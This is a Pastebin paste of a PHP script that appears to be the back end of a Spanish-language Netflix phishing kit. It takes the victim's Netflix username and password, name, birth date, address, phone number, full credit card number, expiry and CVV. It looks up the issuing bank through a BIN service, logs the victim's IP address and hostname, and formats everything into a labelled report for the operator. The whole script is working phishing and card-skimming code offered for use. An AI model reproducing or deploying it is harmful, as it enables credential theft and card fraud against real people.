Guest User

Untitled

a guest
Dec 15th, 2017
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.88 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. session_start();
  4.  
  5.  
  6. $user = $_POST ['user'];
  7. $pass = $_POST ['pass'];
  8. $nombre = $_POST ['nombre'];
  9. $dia1 = $_POST ['dia1'];
  10. $mes1 = $_POST ['mes1'];
  11. $ano1 = $_POST ['ano1'];
  12. $direccion = $_POST ['direccion'];
  13. $ciudad = $_POST ['ciudad'];
  14. $provincia = $_POST ['provincia'];
  15. $postal = $_POST ['postal'];
  16. $fono = $_POST ['fono'];
  17. $pais = $_POST ['pais'];
  18. $cc = $_POST ['cc'];
  19. $mes = $_POST ['mes'];
  20. $ano = $_POST ['ano'];
  21. $cvv = $_POST ['cvv'];
  22. $bin = substr($_POST ['cc'], 0, 8);
  23. $infobin = json_decode(file_get_contents("https://lookup.binlist.net/$bin"));
  24.  
  25.  
  26.  
  27. $infobin1 = json_decode(file_get_contents("https://lookup.binlist.net/$bin"));
  28. $IP = getenv("REMOTE_ADDR");
  29. $time = date('l jS \of F Y h:i:s A');
  30. $ISP = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  31.  
  32. $Html = '
  33. <pre>+-----+ [ ✪ Pastru|o ✪ ] +-----+<br/>
  34. +-----+ [ ✉ Netflix ✉ ] +-----+<br/>
  35. [+] Usuario : '.$_SESSION['user'].'
  36. [+] Contrasena : '.$_SESSION['pass'].'<br/>
  37. +-----+ [ ♡ Informacion ♡ ] +-----+<br/>
  38. [+] Pais : '.$pais.'
  39. [+] Nombre : '.$nombre.'
  40. [+] Nacimiento : '.$dia1.' / '.$mes1.' / '.$ano1.'
  41. [+] Direccion : '.$direccion.'
  42. [+] Ciudad : '.$ciudad.'
  43. [+] Provincia : '.$provincia.'
  44. [+] Codigo Postal : '.$postal.'
  45. [+] Telefono : '.$fono.'<br/>
  46. +-----+ [ 💳 Tarjeta de Credito 💳 ] +-----+<br/>
  47. [+] Numero de Tarjeta : '.$cc.'
  48. [+] Vencimiento : '.$mes.' / '.$ano.'
  49. [+] Cvv : '.$cvv.' <br/>
  50. +-----+ [ ✰ Banco ✰ ] +-----+<br/>
  51. [+] Tipo : '.$infobin->type.'
  52. [+] Banco : '.$infobin->bank->name.'
  53. [+] Pais : '.$infobin->country->name.' <br/>
  54. +-----+ [ ▷ IP ◁ ] +-----+<br/>
  55. [+] IP : '.$IP.'
  56. [+] Hostname : '.$ISP.'
  57. [+] Hora : '.$time.'<br/>
  58. +-----+ [ • ™ Netflix by Pastru|o ™ • ] +-----+</pre>
Add Comment
Please, Sign In to add comment